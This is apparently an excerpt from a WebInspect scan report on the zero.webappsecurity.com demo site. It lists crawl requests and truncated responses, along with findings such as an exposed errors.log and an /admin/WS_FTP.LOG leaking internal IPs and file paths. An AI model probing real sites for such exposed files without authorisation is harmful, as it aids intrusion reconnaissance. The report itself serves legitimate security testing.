Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:07 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"95631-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 95631
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
...TRUNCATED...ty checks, allowing JSP source code
disclosure, among other security problems.</b></p>
</td></tr><tr><td align="left" valign="center"><code class="attributeName">antiJARLocking</code></td><td align="left"
valign="center">
<p>If true, the Tomcat classloader will take extra measures to avoid
JAR file locking when resources are accessed inside JARs through URLs.
This will impact startup time of applications, but could prove t...TRUNCATED....</p>
</td></tr><tr><td align="left" valign="center"><code class="attributeName">antiResourceLocking</code></td><td
align="left" valign="center">
<p>If true, Tomcat will prevent any file locking.
Report Date: 10/10/2016

24

This will significantly impact startup time of applications,
but allows full webapp hot deploy and undeploy on platforms
or configurations where file locking can occur.
If not specified, the default value is <code>false</code>.</p>
<p><code>antiJARLocking</co...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/jasper-howto.html

Request:
GET /docs/jasper-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="C33DFBBAD4C4088E60F854AC44EDE617";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="f5fad4c3-fd67-44ff-9cd8-fe03c78a5797";
X-Request-Memo: ID="4eb42312-d1aa-4164-a322-d729a5f3a7cb"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"27136-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 27136
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
...TRUNCATED...e generated files
compatible with? (Default value: <code>1.6</code>)</li>
<li><strong>development</strong> - ...TRUNCATED...ue
an error when the value of the class attribute in an useBean action is not a
valid bean class? <code>tr...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/appdev/processes.html

Request:
GET /docs/appdev/processes.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="BFD4ECE108385B7050A05A6791AC2819";
PSID="16A0FCA95F27748B361F869AE08E40BF"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="d8415a51-6032-4553-9d5c-b56bfd9b2a36";
X-Request-Memo: ID="61ea2d41-be5e-4caf-8271-147f6154941e"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:10 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21139-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 21139
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
...TRUNCATED...al. If you are using a different source code control environment, you
will need to figure out the corresponding com...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/logging.html

Request:
GET /docs/logging.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="B03E0419F5D635D0EAC6624B1D254B23";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4c6c0e3b-6350-4a20-9486-d19b4b40b26d";
X-Request-Memo: ID="142269d1-b4e6-4e49-bf25-f487cfb9ae2a"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:29 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"38261-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 38261
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
...TRUNCATED...umentation in the JDK for the complete details:
</p>
<div class="codeBox"><pre><code>org.apache.catalina....TRUNCATED... prefix may be added to handler names, so that multiple handlers of a
single class may be instantiated. ...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/monitoring.html

Request:
GET /docs/monitoring.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="9F4C1B8B0854C98B23B22FEFF5F16E61";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="c69bb0a8-b200-4d4b-a76a-8186f40f5309";
X-Request-Memo: ID="6ed9ecad-77f1-4afc-bc52-ca3ee97dbdcf"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:29 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"46020-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 46020
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED...istration. Looking inside a
running server, obtaining some statistics or reconfiguring some aspects of
...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/cluster-howto.html

Request:
GET /docs/cluster-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="9099B5738BA56B5A5A2C4CBE80AD5F64";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="aa9fb7e0-1fb2-4905-9e2b-b47e24b9319f";
X-Request-Memo: ID="2a21be90-ee76-4e51-8388-670e0e99fd6f"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:27 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"49037-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 49037
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
...TRUNCATED... href="config/index.html">Configuration</a></li><li><a href="api/index.html">Tomcat Javadocs</a></li><li><a href="servletapi/index.html">Servlet Javadocs</a></li><...TRUNCATED...ie, so your URL must look
the same from the outside otherwise, a new session will be created.</p>
<p>Note: Clustering support currently requires the JDK vers...TRUNCATED... Remember, if you are adding your own valves or cluster listeners in server.xml then the defaults are no longer valid,
make sure that you add in all the appro...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/building.html

Request:
GET /docs/building.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="92BF4760E2D0FDCA4ABB18FC0B743B5E";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4fede3ba-e46c-473f-8253-ef124324ef8f";
X-Request-Memo: ID="93076e7c-a2b4-4b9a-bfb5-cd5b632a4b75"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21672-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 21672
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED...<li><a href="elapi/index.html">EL 2.2 Javadocs</a></li><li><a href="websocketapi/index.html">WebSocket 1.1 Javado...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/config/resources.html

Request:
GET /docs/config/resources.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/config/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="D8C85E6CAB767433EC2E6A7C094C1125";
PSID="7E09004C87348100F227487435CD3213"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="45855288-73af-4d6e-af8d-a51c210129d5";
X-Request-Memo: ID="5574ac61-544a-4101-8312-8660a8c925af"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:51 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"14649-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 14649
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
...TRUNCATED...ership</a></li><li><a href="cluster-sender.html">Channel/Sender</a></li><li><a href="cluster-receiver.html">Channel/Receiver</a></li><li><a href="cluster-interceptor.html">Channel/Interceptor</a></li><li><a
href="...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/changelog.html

Request:
GET /docs/changelog.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="F3D4D3DB0835679411A7D304D23D3F25";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="d3fb0222-b563-436f-a2c5-fbbe1e8ab812";
X-Request-Memo: ID="fc2ff44c-5fb3-49d9-aa78-f04736ad5519"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"895262-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 895262
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
...TRUNCATED... may be read as the
start of the next request leading to a 400 response. (markt)
</td></tr>
</t...TRUNCATED...
<a href="http://bz.apache.org/bugzilla/show_bug.cgi?id=56717">56717</a>: Fix duplicate registration of
...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/windows-auth-howto.html

Request:
GET /docs/windows-auth-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="FF70A74D422C22B72591B6C68DE7DBA3";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e2085897-d964-4fb8-80e5-97e2cc35784c";
X-Request-Memo: ID="49bd3422-4472-4f1c-8766-5779e21a7e15"; sc="2"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:43 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"27921-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 27921
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
...TRUNCATED...l trusted
intranet.</li>
<li>The SPN must be HTTP/&lt;hostname&gt; and it must be exactly the same in all
the places i...TRUNCATED...

Web Server Misconfiguration: Unprotected File


Page:

description

http://zero.webappsecurity.com:80/docs/ssi-howto.html

Request:
GET /docs/ssi-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="CB04B081478DF74AFDD0F66123F0F73B";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="cdb81246-bfb8-4cf3-90bd-7ef6737b4bff";
X-Request-Memo: ID="7ed138d2-5ac8-481d-a34c-d0e719a44700"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21189-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 21189
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
...TRUNCATED... The server's IP address.</td>
</tr>
<tr>
<td>SERVER_NAME</td>
<td>
The server's hostname or IP address.</td>
</tr>
<tr>
<td>SERVER_PORT</td>
<td>
The port on which the server receiv...TRUNCATED...

System Information Leak: Internal IP


Page:

description

http://zero.webappsecurity.com:80/errors/errors.log

Request:
GET /errors/errors.log HTTP/1.1
Referer: http://zero.webappsecurity.com/errors/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="C32128A8498A56E4E6435B6994687E3A";
PSID="BB23AC8A7B9C89C3DE9576C0FEACCA3F"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="903a6949-6ac8-489d-8c93-bb0ff0a74979";
X-Request-Memo: ID="7fb39035-d4ae-41aa-a0e7-7b0907724343"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21684-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 21684
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Tue Jan 22 09:11:32 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...nc].
Tue Jan 22 09:31:20 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...ec].
Tue Jan 22 10:49:37 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...et].
Tue Jan 22 11:55:56 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...us].
Tue Jan 22 13:45:58 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...bi].
Tue Jan 22 14:55:38 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...u.].
Tue Jan 22 16:12:29 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...n,].
Tue Jan 22 18:51:49 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...nt].
Tue Jan 22 18:55:01 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...ae].
Tue Jan 22 18:57:25 EST 2013 [ERROR] [local 10.5.157.10] [com.zero.bank.auth.UserAuthenticator.authentica...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/monitoring.html

Request:
GET /docs/monitoring.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="9F4C1B8B0854C98B23B22FEFF5F16E61";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="c69bb0a8-b200-4d4b-a76a-8186f40f5309";
X-Request-Memo: ID="6ed9ecad-77f1-4afc-bc52-ca3ee97dbdcf"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:29 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"46020-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 46020
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED...&lt;property name="cluster.server.address" value="192.168.1.75" /&gt;
&lt;property name="cluster.server.port"...TRUNCATED...ina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025"
attribute="connected"
...TRUNCATED...ina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025"
attribute="connected"
...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/WS_FTP.LOG

Request:
GET /admin/WS_FTP.LOG HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="DC2EF0E7C935D7C47528CB0D2E9C1565";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="60b8f839-2e70-4177-8e47-f305852be435"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="764"; Engine="Site+Search";
SmartMode="NonServerSpecificOnly"; ThreadId="87"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="c47c8ae6-5758-42e7-82e9-f1558a268886";
X-Request-Memo: ID="807fe938-5c65-4f99-b66a-76c6511855c4"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:38 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"504686-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Length: 504686
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/plain
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburnepo\root\oad\incoming\lorenzo\boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn repo\root\oad\incoming\lorenzo\boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --...TRUNCATED...\root\oad\incoming\lorenzo\boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> surepo\root\oad\incoming\lorenzo\boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> ...TRUNCATED...po\root\oad\incoming\lorenzo\boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> ...TRUNCATED...po\root\oad\incoming\lorenzo\boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sun_repo\root\oad\incoming\lorenzo\boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> surepo\root\oad\incoming\lorenzo\boston water5.jpg
cf310.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC C:\old_repo\root\oad\boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn C:\ol...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/config/filter.html

Request:
GET /docs/config/filter.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/security-howto.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="46494C4CFCA02171D7106D528B555498";
PSID="1F194499C7D4146D9EC2FB6CA4EFA71D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="133118b0-4eff-49e5-b4ad-6236be637206";
X-Request-Memo: ID="60f43f76-a3b1-4fe5-8cdc-73366ecbed84"; sc="2"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:49 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"107756-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 107756
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
...TRUNCATED...
<td> request.remoteAddr </td>
<td> 192.168.0.10 </td>
<td> 140.211.11.130 </td>
<...TRUNCATED...code>]</code> </td>
<td> 140.211.11.130, 192.168.0.10 </td>
<td> null </td>
</tr>
...TRUNCATED...
<td> request.remoteAddr </td>
<td> 192.168.0.10 </td>
<td> 140.211.11.130 </td>
<...TRUNCATED...
<td> request.remoteAddr </td>
<td> 192.168.0.10 </td>
<td> 140.211.11.130 </td>
<...TRUNCATED...td>
<td> 140.211.11.130, proxy1, proxy2, 192.168.0.10 </td>
<td> null </td>
</tr>
...TRUNCATED...
<code>x-forwarded-by</code> header. As <code>192.168.0.10</code> is an internal
proxy, it does not app...TRUNCATED...
<td> request.remoteAddr </td>
<td> 192.168.0.10 </td>
<td> untrusted-proxy </td>
...TRUNCATED...

Web Server Misconfiguration: Unprotected Directory


Page:

description

